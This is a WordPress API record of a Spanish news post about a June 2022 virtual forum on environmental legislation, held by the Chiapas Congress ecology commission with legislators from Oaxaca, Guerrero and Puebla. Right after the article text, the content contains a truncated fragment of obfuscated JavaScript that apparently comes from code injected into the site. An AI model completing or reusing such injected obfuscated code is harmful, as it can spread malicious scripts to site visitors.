{"id":2850,"date":"2022-06-11T00:21:44","date_gmt":"2022-06-11T00:21:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2850"},"modified":"2022-06-11T00:21:45","modified_gmt":"2022-06-11T00:21:45","slug":"presentan-foro-nacional-la-legislacion-del-medio-ambiente-desde-el-congreso-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2850","title":{"rendered":"Presentan Foro nacional \u201cLa legislaci\u00f3n del medio ambiente\u201d desde el Congreso de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023-1024x682.jpg\" alt=\"\" class=\"wp-image-2851\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220610-WA0023.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>*Dicho foro cont\u00f3 con la presencia especial de los presidentes de las comisiones ambientales del estado de Oaxaca, Guerrero y Puebla. <\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 10 de junio de 2022.- La Comisi\u00f3n de Ecolog\u00eda y Cambio Clim\u00e1tico presidida por la diputada Zoily Linaloe Nango Molina, realiz\u00f3 el Primer foro nacional virtual: \u201cLa legislaci\u00f3n sobre el medio ambiente\u201d, con el prop\u00f3sito de conmemorar el D\u00eda Mundial del Medio Ambiente. Dicho evento se nutri\u00f3 de la presencia de legisladores y legisladoras de las comisiones ambientales en los Congresos de Oaxaca, Guerrero y Puebla, por lo que, se formul\u00f3 un intercambio de aprendizajes, experiencias y propuestas para fortalecer el trabajo legislativo en beneficio de los estados participantes y de M\u00e9xico.El foro puntualiz\u00f3 sobre los puntos de acuerdo e iniciativas como unidad forense para animales, ley de cambio clim\u00e1tico, verificaci\u00f3n vehicular, temas de residuos s\u00f3lidos urbanos, crecimiento desmedido de la poblaci\u00f3n, leyes para el acceso a la informaci\u00f3n para la protecci\u00f3n y justicia para las y los ambientalistas, ley de equilibrio ecol\u00f3gico, el uso de materiales sustentables para obras p\u00fablicas, la prohibici\u00f3n de mutilaciones a animales con fines est\u00e9ticos y ley de bienestar animal, entre otros.En primer lugar, la diputada Nango Molina agradeci\u00f3 el llamado de sus compa\u00f1eros y compa\u00f1eras legisladoras para participar en dicho ejercicio, en pro de una agenda com\u00fan hacia la conservaci\u00f3n del planeta. Nango Molina propuso extender una apertura en la agenda legislativa en cada congreso, para hacer un llamado a la ciudadan\u00eda y, entre ambos, generar un beneficio para todas y todos.  Por su parte, la diputada Merlina Hern\u00e1ndez Sosa del Congreso de Oaxaca, reafirm\u00f3 la necesidad de trabajar la tarea tit\u00e1nica y noble, de legislar y crear leyes sobre el eje ambiental. Al mismo tiempo, resalt\u00f3 que, en su estado dicha comisi\u00f3n est\u00e1 integrada por mujeres, quienes han trabajado en coordinaci\u00f3n con la sociedad y diversas organizaciones, teniendo como resultado el exhorto de principio precautorio ambiental, que tiene como fin la cancelaci\u00f3n de pol\u00edticas p\u00fablicas que atenten contra el medio ambiente y \u00e1reas naturales protegidas.Mientras tanto, Manuel Qui\u00f1onez Cort\u00e9z, legislador local del estado de Guerrero, comparti\u00f3 el logro de tener haber propuesto una iniciativa de ley de responsabilidad ambiental del estado de guerrero, donde pretenden que el estado cuente con un marco jur\u00eddico sobre protecci\u00f3n ambiental, debido a que desde 1922 no se ha asumido las obligaciones de los agentes que ocasionan la contaminaci\u00f3n y da\u00f1os al entorno. Jaime Natale Uranga, congresista local en Puebla, felicit\u00f3 a la legisladora chiapaneca por este ejercicio legislativo, cuya organizaci\u00f3n se convierte en un referente para los pr\u00f3ximos acercamientos entre comisiones de cambio clim\u00e1tico. Resalt\u00f3 que su comisi\u00f3n est\u00e1 conformada de muchas fuerzas pol\u00edticas, siendo un grupo plural, lo que han conducido a distintas iniciativas y puntos de acuerdo, como la creaci\u00f3n de una fiscal\u00eda especializada en delitos ambientales y en contra el maltrato animal. Por \u00faltimo, la legisladora chiapaneca agradeci\u00f3 a cada uno de los legisladores y legisladoras por el trabajo a favor del ecosistema y, enfatiz\u00f3 que la comisi\u00f3n del estado de Chiapas que continua con la creaci\u00f3n de en nuevas iniciativas como la ley de desarrollo forestal sustentable para crear un centro estatal de protecci\u00f3n civil de monitoreo, riesgo y protecci\u00f3n del fuego. Al mismo tiempo, han promovido una ley para la protecci\u00f3n y castigo del maltrato animal con penas m\u00e1s severas, en la que se ha tratado de respetar los usos y costumbres de los pueblos originarios. Sin olvidar, la labor conjunta por la concientizaci\u00f3n hacia la poblaci\u00f3nPara finalizar el evento, se destac\u00f3 la convocatoria del parlamento medioambiental Chiapas 2022, donde la ciudadan\u00eda en general podr\u00e1 exponer las problem\u00e1ticas distintas para fortalecer y crear una ley que exprese el sentir de la ciudadan\u00eda a favor de la conservaci\u00f3n de los ecosistemas.\u201cQueremos activar algunas cosas que se dejaron en las legislaturas pasadas (\u2026) El medio ambiente no necesita de protagonismos, ni de partidos, ni de colores, todos sumamos, necesitamos fortalecer el trabajo en conjunto, con un grande compromiso, con retos considerables por delante, sin esperar nada a cambio\u201d finaliz\u00f3 Nango Molina.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>*Dicho foro cont\u00f3 con la presencia especial de los presidentes de las comisiones ambientales del estado de Oaxaca, Guerrero y Puebla. Tuxtla Guti\u00e9rrez, Chiapas a 10 de junio de 2022.- La Comisi\u00f3n de Ecolog\u00eda y Cambio Clim\u00e1tico presidida por la diputada Zoily Linaloe Nango Molina, realiz\u00f3 el Primer foro nacional virtual: \u201cLa legislaci\u00f3n sobre el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2851,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-2850","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2850","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2850"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2850\/revisions"}],"predecessor-version":[{"id":2852,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2850\/revisions\/2852"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2851"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}